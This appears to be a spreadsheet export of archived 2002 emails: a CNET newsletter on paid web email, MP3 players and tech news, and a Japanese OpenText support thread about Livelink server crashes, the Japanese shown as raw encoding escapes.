    <t>http://www.cnet.co http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://i.i.com.com http://www.techrepublic.com http://www.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.c http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.c http://home.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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gserv-cnet.zdnet.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: CNET Digital Dispatch &lt;Online#3.19856.0b-J216gBVtducSysRR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 17:19:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 17:19:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Digital Dispatch &lt;Online#3.19856.0b-J216gBVtducSysRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET DIGITAL DISPATCH: Saying good-bye to free</t>
  </si>
  <si>
    <t>![Digital Dispatch]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n  \n![]([URL]http://i.i.com.com[/URL]\n![]([URL]http://www.techrepublic.com[/URL]\n\n  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nAll CNET The Web  \n---  \n  \n![Tech News News.com]([URL]http://www.cnet.com[/URL]  \nApple to expand iMac LCD display\n\nIt ain't heavy; it's my laptop\n\nGateway touts chic yet cheap PCs\n\nApple's iPod comes to Linux\n\nDell PCs coming to a mall near you  \n  \n---  \n**More CNET News**  \n  \n![Top Downloads]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nQuintessential Player 3.4  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nAI Picture Utility 6.2.1  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nICQ 2002a Build #3728  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nDeck 3.5 (for the Mac)  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n![Editors' Choice]([URL]http://www.cnet.com[/URL]  \nDell Latitude C510/C610 series ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Hardware  \n---  \nToshiba Pocket PC e310 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \nAutoCAD LT 2002 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Software  \nSony Ericsson T68 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Wireless  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n  \n| ![]([URL]http://www.cnet.com[/URL]  \n  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL]  \n|  | July 11, 2002  \n  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n\--Janice Chen,  \neditor in chief,  \nCNET Reviews  \n|  |  **Dear readers,**  \nIt was a crushing blow to discover that Vindigo, my all-time-favorite Palm\napp, was no longer free. Twenty-five bucks wasn't steep, but the principle of\npaying for a former freebie was hard to swallow. Not that hard, though;\nsurprising myself--and my fellow cheapskates--I've discovered that I'd rather\ndish out the dough than go Vindigo-free myself.\n\nThat's what Web-based e-mail providers are banking on. Now that most of us\nhave gotten sucked in by those gratis Web e-mail accounts, most "free" Web\ne-mailers have started charging for premium services or imposing strict\nlimitations on free accounts. Read our reviews of the four top services to see\nwhat you get if you dish out the dough (or not)--and which to avoid if you\nwant to stay spam-free.\n\nSurfacing on this week's Buzz Meter is another free-gone-fee app. The latest\nversion of the popular file-sharing software BearShare now offers a paid\nversion that lets you search and download without those annoying ads. Maybe\nthe best things in life are now those with a fee.  \n  \n  \n---|---|---  \n---  \n![This Week's Buzz Meter]([URL]http://www.cnet.com[/URL]  \n| WorldCom woes continue  \n  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![Crucial Clicks]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | **Next-generation MP3 players**  \nThese three hard drive-based MP3 players turn last year's models into\npaperweights.  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \nÂ• Mojo rising: TDK's new MP3 CD player  \nÂ• The Nomad Jukebox 3 breaks new ground  \n  \n![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n**Most popular**  \n![]([URL]http://home.cnet.com[/URL]  \n**MP3 &amp; audio**  \n![]([URL]http://home.cnet.com[/URL]  \n1\. Creative Labs Nomad Jukebox 3  \n![]([URL]http://home.cnet.com[/URL]  \n2\. iRiver SlimX iMP-350  \n![]([URL]http://home.cnet.com[/URL]  \n3\. Sonicblue Rio Volt SP250  \n![]([URL]http://home.cnet.com[/URL]  \n4\. Sonicblue Rio Riot  \n![]([URL]http://home.cnet.com[/URL]  \n5\. Archos Jukebox Recorder  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL] **See all most popular**  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n  \n\n![Software]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**CNET reviews four no-cost Web e-mailers**  \nYahoo now charges for services that were once free; Hotmail dumps accounts\nwithout so much as an explanation. So-called free Web-based e-mailers aren't\nquite as free-wheelin' as they once were. Are the savings worth the hassle? We\ntake another look at "free" e-mailers. More software  \n\n![Hardware]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**IBM's thin ThinkPads fit to a T**  \nThe ThinkPad T-series notebooks are fast, and they offer a great design,\ninnovative features, and good support. For a comprehensive look at this line\nof notebooks, check out our verdict. More notebooks  \n**Read the review |  Check latest prices**  \n\n![Electronics]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**MP3 player personality test**  \nThese days, there are almost as many types of MP3 player as there are types of\nMP3 listener. That's why it can be a daunting task to winnow through what's\navailable to find your perfect match. Take our MP3 player personality test to\nfind out which one suits you best. More portable audio  \n\n![Tech Trends]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Gifts for grads: home entertainment**  \nFixing up that first apartment can be a trying time for a young grad. Make it\neasy by throwing in some home-theater equipment along with the\ncongratulations. Combining a DVD player with a solid speaker system, the Onkyo\nHTS-L5 is the perfect all-in-one-device. Also on tap: portable DVD players,\nthe best TiVo player we found, and a 27-inch HD-ready TV set that's perfect\nfor the smart set. More in Tech Trends  \n\n![Software]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Peachtree Complete Accounting 2003**  \nFor years, Peachtree has provided professional accounting to small businesses.\nAs a result, Peachtree Complete 2003 has all the basics, including inventory\ncontrol, time billing, and payroll management. And Peachtree even contains a\nwide array of Web tools for creating and maintaining an online store. What's\nnew in 2003? More software  \n\n![Wireless]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Siemens S46**  \nThe company's second mobile for the U.S. market picks up where the stylish S40\nleft off. Like that earlier model, this one's a world phone with business-\ncentric features. How impressive is it? More in wireless phones  \n\n  \n![Buzz Meter]([URL]http://www.cnet.com[/URL] | **  WorldCom woes\ncontinue**| ![]([URL]http://www.cnet.com[/URL]  \n---|---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nWorldCom woes dominate, BearShare 4.0 isn't what it used to be, and Jaguar\nruns ahead of schedule.  \n_\--Laura Lindhe, executive editor, CNET Tech Trends_\n\n**1** | **WorldCom:**  \nI hate to put it first, but unfortunately, all other tech trends are\novershadowed by this scandal. Now entering its fourth week as front-page news,\nWorldCom woes continue to sap investor confidence. This week's big story: the\ntop execs from the company are standing silent against government accusations\nof wrongdoing.  \n---|---  \n**2** | **BearShare 4.0:**  \nThis new version of the well-known peer-to-peer software was been completely\nredesigned and comes in two flavors: free with ads and paid without ads. This\nis nice touch, but unfortunately, 4.0 fails in one key area: downloading\nmusic. It uses the Gnutella client, but in CNET's tests, it had an abysmal\nsuccess rate at actually returning files.  \n**3** | **Jaguar:**  \nWho ever heard of an operating system release being early? Well, Apple is\nmanaging to pull off the impossible; it intends to ship an update to OS X in\nAugust, instead of the anticipated late fall time frame.  \n**4** | **Warcraft III:**  \nAh, summer: the perfect time to stay inside and sit in front of your computer.\nWarcraft III has just been released--right in time for the good weather.\nGameSpot calls it one the finest games ever made, but if that doesn't do it\nfor you, there's another fighting game on deck (see No. 5).  \n**5** | **America's Army:**  \nAs Senior Editor Darren Gladstone pointed out in a recent column, the Army\nwants _you_ to play PC games. That's right: the United States Army spent $6.3\nmillion developing its own title, and it has just launched a television\ncampaign to drum up interest. Apparently, the campaign is working, since CNET\nusers made America's Army a top search term last week.  \nFor more Buzz, click here.  \n  \n![]([URL]http://home.cnet.com[/URL]\n![]([URL]http://home.cnet.com[/URL]  \n**\n\n  * Live tech help: submit your question now\n  * CNET News.com: Top CIOs on the future of IT\n  * Find a job you love with more than 1 million postings\n  * Editors' Choice Award: Pioneer's HTS-910DV\n\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zdnet@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04-02&amp;ISSUE=2002-07-11)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://i.i.com.com http://www.techrepublic.com http://a.r.tv.com http://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www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.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lt;aebenjam@opentext.com&gt;\nFrom: "Hitoshi Ito" &lt;hito@opentext.com&gt;\nDate: Thu, 11 Jul 2002 16:30:16 -0400</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 16:30:16 -0400</t>
  </si>
  <si>
    <t>"Hitoshi Ito" &lt;hito@opentext.com&gt;</t>
  </si>
  <si>
    <t>&lt;aebenjam@opentext.com&gt;</t>
  </si>
  <si>
    <t>=?iso-2022-jp?B?UmU6IBskQjswSSkyPTNYJSglcyU4JUslIiVqJXMlME1NJVcbKEI=?=</t>
  </si>
  <si>
    <t>OTC/_x001B_$B0KElMM_x001B_(B _x001B_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM$N_x001B_(Blivelink_x001B_$B%m%0$+$i$O_x001B_(B _x001B_$B8=:_!"860x$,FCDj$G$-$J$$$?$a_x001B_(B _x001B_$B&gt;pJs$r@0M}$7!"4D6-LL$r4^$a!"LdBj$N@Z$jJ,$1$r9T$J$C$F$$$-$^$9!#_x001B_(B _x001B_$B$=$N$?$a$K_x001B_(B[Service for UNIX]_x001B_$B$K4X$7$FLdBj$,$J$+$C$?$N$+_x001B_(B _x001B_$B3NG'$5$;$F$$$?$@$-$^$7$?!#_x001B_(B _x001B_$B%W%m%;%9%@%&amp;%s$NMW0x$H$7$F!"$5$^$6$^$J%1!&lt;%9$,$"$j$^$9$,_x001B_(B _x001B_$B4F::5!G=%m!&lt;%IIT6q9g!"_x001B_(BCA_x001B_$B$NIT6q9g0J30$K_x001B_(B _x001B_$B860x$N@Z$jJ,$1$N$?$a!"%W%m%;%9%@%&amp;%s$N860x$H$J$C$?FbMF$r_x001B_(B _x001B_$BJs9p$7$F$$$?$@$1$J$$$G$7$g$&amp;$+!#_x001B_(B _x001B_$B$J$*!"_x001B_(B[Service for UNIX]_x001B_$B$NLdBj$H$7$F!"_x001B_(BLivelink_x001B_$B$N;HMQ$9$k4D6-$H$O_x001B_(B _x001B_$BD&gt;@\4X78$J$$$+$b$7$l$^$;$s$,$*CN$i$;$7$^$9!#_x001B_(B [URL]http://www.microsoft.com[/URL] [URL]http://www.microsoft.com[/URL] O&amp;FR=0 _x001B_$B%W%m%;%9%@%&amp;%s$,0l9o$bAa$/2r7h$G$-$k$h$&amp;_x001B_(B _x001B_$B$46(NO$*4j$$$$$?$7$^$9!#_x001B_(B _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B _x001B_$B0KF#!!@55A_x001B_(B -------- Original Message -------- Subject: RE: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001B_(B  - ticket #55606OTC1 - Date: Tue, 30 Oct 2001 13:44:43 -0500 From: "Hitoshi Ito" &lt;&gt; Reply-To: &lt;&gt; To: "'it-oh'" &lt;&gt; CC: &lt;&gt;, &lt;&gt;,&lt;&gt;, &lt;&gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; _x001B_$B0KF#MM_x001B_(B &gt; &gt; OpenText_x001B_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; [Service for UNIX] _x001B_$B$N$4 _x001B_$B$$$?$@$-$^$9!#%5%]!&lt;%H$N%^%M!&lt;%8%c$K3NG'$r [Service for UNIX]_x001B_$B$r;HMQ$5$l$F$$$k$H$$$&amp;Nc$OJ9$$$?$3$H$,$"$j$^$;$s!#_x001B_(B &gt; _x001B_$BLdBj$J$/F0:n$9$k$+$I$&amp;$+$O5?Ld$,$"$k$=$&amp;$G$9!#%5%]!&lt;%H$5$l$F$$$J$$_x001B_(B &gt; _x001B_$B4D6-$G$9$7!" _x001B_$B!J&gt;/$J$/$H$b%5%]!&lt;%H$N$[$&amp;$KJs9p$5$l$F$$$kCf$G$O!"$G$9$,!&amp;!&amp;!&amp;!K_x001B_(B &gt; &gt; _x001B_$B2?$+!"_x001B_(B[Service for UNIX]_x001B_$B$,860x$G$O!"$H9M$($i$l$k$3$H$G$b$"$C$?$N$G_x001B_(B &gt; _x001B_$B$7$g$&amp;$+!)$b$7!";0I)2=3XMM$G!"%5%]!&lt;%H$5$l$F$$$kHO0O$G%W%m%;%9%@%&amp;%s_x001B_(B &gt; _x001B_$B$,5/$3$k$+%F%9%H$r9T$($k$h$&amp;$G$7$?$i!"3NG'$7$F$_$F$$$?$@$1$^$9$G$7$g$&amp;_x001B_(B &gt; _x001B_$B$+!)$G$-$k$@$1GS=|$G$-$kMW0x$O@Z$jN%$7$F$$$?$@$-$?$/;W$$$^$9!#_x001B_(B &gt; _x001B_$B!J$=$N@a$O!":#$^$G$N%W%m%;%9%@%&amp;%s$N%A%1%C%H!"_x001B_(B53121OTC1_x001B_$B$N$[$&amp;$G_x001B_(B &gt; _x001B_$BBP1~$$$?$7$^$9!#!K_x001B_(B &gt; &gt; _x001B_$B$h$m$7$/$*4j$$CW$7$^$9!#_x001B_(B &gt; &gt; &gt; -----Original Message----- &gt; &gt; From: it-oh [mailto:] &gt; &gt; Sent: Tuesday, October 30, 2001 5:16 AM &gt; &gt; To: &gt; &gt; Cc: ; ; &gt; &gt; ; &gt; &gt; Subject: Re: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001B_(B - ticket &gt; &gt; #53121OTC1 - &gt; &gt; &gt; &gt; &gt; &gt; OTC/_x001B_$B0KElMM_x001B_(B &gt; &gt; _x001B_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM$N4D6-$r3NG'$7$?$H$3$m_x001B_(B &gt; &gt; NT_x001B_$B&gt;e$K_x001B_(BLL8141_x001B_$B%5!&lt;%P$H_x001B_(BIndex_x001B_$B%G!&lt;%?$,$"$j$^$9$,_x001B_(B &gt; &gt; _x001B_$B30It%I%-%e%a%s%H$O!"_x001B_(B[Service for UNIX2.0]_x001B_$B$r;HMQ$7_x001B_(B &gt; &gt; Solaris2.6_x001B_$B$N_x001B_(BFileSystem_x001B_$B&gt;e$KB8:_$7$F$$$^$9!#_x001B_(B &gt; &gt; _x001B_$B$J$*!"_x001B_(BOracle_x001B_$B%(%s%8%s!"_x001B_(BTableSpace_x001B_$B$O!"_x001B_(BSolaris_x001B_$B&gt;e$K$"$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B2a5n$K_x001B_(B[Service for UNIX]_x001B_$B$,860x$G%W%m%;%9%@%&amp;%s$K$J$C$?$3$H$O_x001B_(B &gt; &gt; _x001B_$B$"$j$^$9$+!#$^$?!"_x001B_(B[Service for UNIX]_x001B_$B$r;HMQ$7$F$$$k%f!&lt;%6$O!"$I$N$0$i$$_x001B_(B &gt; &gt; _x001B_$B$$$k$N$+GD0.$5$l$F$$$^$7$?$i$*CN$i$;$/$@$5$$!#_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$h$m$7$/$*4j$$$$$?$7$^$9!#_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; _x001B_$B0KF#!!@55A_x001B_(B &gt; &gt; &gt; &gt; -------- Original Message -------- &gt; &gt; Subject: RE: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001B_(B &gt; &gt;  - ticket #53121OTC1 - &gt; &gt; Date: Thu, 18 Oct 2001 17:24:33 -0400 &gt; &gt; From: "Hitoshi Ito" &lt;&gt; &gt; &gt; Reply-To: &lt;&gt; &gt; &gt; To: "'it-oh'" &lt;&gt; &gt; &gt; CC: &lt;&gt;, &gt; &gt; &lt;&gt;,&lt; &gt; &gt; &gt;, &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; &gt; _x001B_$B0KF#MM_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; OpenText_x001B_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%7%+%4$+$i$NJV;v$G$O!"$*Aw$j$$$?$@$$$?_x001B_(Bwatch.log_x001B_$B$+$i$O%a%b%j$,860x$N$h_x001B_(B &gt; &gt; _x001B_$B$&amp;$G$O_x001B_(B &gt; &gt; &gt; _x001B_$B$J$$!"$H$N$3$H$G$7$?!#$7$+$7!"860x$O$o$+$i$J$$$=$&amp;$G$9!#@?$K?=$7Lu$J_x001B_(B &gt; &gt; _x001B_$B$$$N$G$9_x001B_(B &gt; &gt; &gt; _x001B_$B$,!"0z$-B3$-_x001B_(BLivelink_x001B_$B%m%0!"_x001B_(BDr. Watson_x001B_$B%m%0$J$I$N &gt; &gt; &gt; &gt; &gt; _x001B_$B@?$K?=$7Lu$J$$$N$G$9$,!"$3$l$,;d%5%]!&lt;%H$N$[$&amp;$G &gt; _x001B_$B$G$9!#$3_x001B_(B &gt; &gt; &gt; _x001B_$B$N7o$K4X$7$F!"&gt;.NS$,%7%+%4$N3+H/$N$[$&amp;$KD&gt;@\O"Mm$r &gt; _x001B_$B$F$*$j$^_x001B_(B &gt; &gt; &gt; _x001B_$B$9!#$$$D$bF1$8$h$&amp;$J;j$i$J$$BP1~$K$J$C$F$7$^$$!"@?$K?=$7Lu$"$j$^$;$s_x001B_(B &gt; &gt; _x001B_$B!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message----- &gt; &gt; &gt; &gt; From: it-oh [mailto:] &gt; &gt; &gt; &gt; Sent: Thursday, October 18, 2001 5:49 AM &gt; &gt; &gt; &gt; To: &gt; &gt; &gt; &gt; Cc: ; ; &gt; &gt; &gt; &gt; ; &gt; &gt; &gt; &gt; Subject: Re: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001B_(B &gt; &gt;  - ticket &gt; &gt; &gt; &gt; #53121OTC1 - &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OTC/_x001B_$B0KElMM_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B?JD=$N3NG'$r$7$F$+$i#1=54V$?$A$^$7$?!#_x001B_(B &gt; &gt; &gt; &gt; _x001B_$BF|K\;~4V$NL@F|!"@hJ}$KJs9p$9$kI,MW$,$"$j$^$9$N$G_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$$$DD4::Js9p$r$$$?$@$1$k$N$+!"%9%1%8%e!&lt;%k$r_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$4O"Mm$7$F$$$?$@$/$3$H$H!"8=:_$^$G$ND4::FbMF$r_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$+$J$i$:!"Ls#1#4;~4V8e!JF|K\;~4V$N6bMKD+#9;~!K_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$^$G$K$*CN$i$;$/$@$5$$!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B0KF#!!@55A_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -------- Original Message -------- &gt; &gt; &gt; &gt; Subject: RE: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001B_(B &gt; &gt; &gt; &gt;  - ticket #53121OTC1 - &gt; &gt; &gt; &gt; Date: Fri, 12 Oct 2001 13:33:26 -0400 &gt; &gt; &gt; &gt; From: "Hitoshi Ito" &lt;&gt; &gt; &gt; &gt; &gt; Reply-To: &lt;&gt; &gt; &gt; &gt; &gt; To: "'it-oh'" &lt;&gt; &gt; &gt; &gt; &gt; CC: &lt;&gt;, &gt; &gt; &gt; &gt; &lt;&gt;,&lt; &gt; &gt; &gt; &gt; &gt;, &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; &gt; &gt; &gt; _x001B_$B0KF#MM_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OpenText_x001B_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$?$@$$$^3+H/$N$[$&amp;$G8!&gt;Z$7$F$*$j$^$9!#$o$+$j &gt; _x001B_$B$9$N_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$G:#$7$P_x001B_(B &gt; &gt; &gt; &gt; &gt; _x001B_$B$i$/$*BT$A2&lt;$5$$!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message----- &gt; &gt; &gt; &gt; &gt; &gt; From: it-oh [mailto:] &gt; &gt; &gt; &gt; &gt; &gt; Sent: Friday, October 12, 2001 2:57 AM &gt; &gt; &gt; &gt; &gt; &gt; To: Hitoshi Ito &gt; &gt; &gt; &gt; &gt; &gt; Cc: ; ; &gt; &gt; &gt; &gt; &gt; &gt; ; &gt; &gt; &gt; &gt; &gt; &gt; Subject: Re:_x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001B_(B &gt; &gt; &gt; &gt;  - ticket &gt; &gt; &gt; &gt; &gt; &gt; #53121OTC1 - &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OTC/_x001B_$B0KElMM_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; thread_x001B_$B%m%0$H_x001B_(Bwatch.log_x001B_$B$h$j%W%m%;%9%@%&amp;%s$K$D$$$F_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$J$K$+$o$+$j$^$7$?$G$7$g$&amp;$+!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$BMh=5$O$8$a$K!";0I)2=3X%(%s%8%K%"%j%s%0MM$KJs9p$9$k_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$BI,MW$,$"$j$^$9$N$G!"$4O"Mm$$$?$@$/$h$&amp;$*4j$$$$$?$7$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B0KF#!!@55A_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -------- Original Message -------- &gt; &gt; &gt; &gt; &gt; &gt; Subject: [RE: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt;   - ticket #53121OTC1 -] &gt; &gt; &gt; &gt; &gt; &gt; Date: Wed, 10 Oct 2001 14:20:02 +0900 &gt; &gt; &gt; &gt; &gt; &gt; From: it-oh &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; To: &gt; &gt; &gt; &gt; &gt; &gt; CC: , &gt; &gt; &gt; &gt; &gt; &gt; ,, &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OTC/_x001B_$B0KElMM_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM_x001B_(B(NT)_x001B_$B$K$F%a%b%j4F;k$N@_Dj8e_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; 10_x001B_$B7n_x001B_(B5_x001B_$BF|$K%W%m%;%9%@%&amp;%s$,H/@8$7$^$7$?!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$=$N;~$N_x001B_(Bthread_x001B_$B%m%0$H_x001B_(Bwatch.log_x001B_$B$r_x001B_(Bftp_x001B_$B%5%$%H_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%f!&lt;%6!"!V_x001B_(Bmitsubishi chemical eng_x001B_$B!WFb$K%"%C%W%m!&lt;%I$7$^$7_x001B_(B &gt; &gt; _x001B_$B$?!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B!V_x001B_(B20011005logs2.zip_x001B_$B!W$r$4Mw2&lt;$5$$!#_x001B_(B 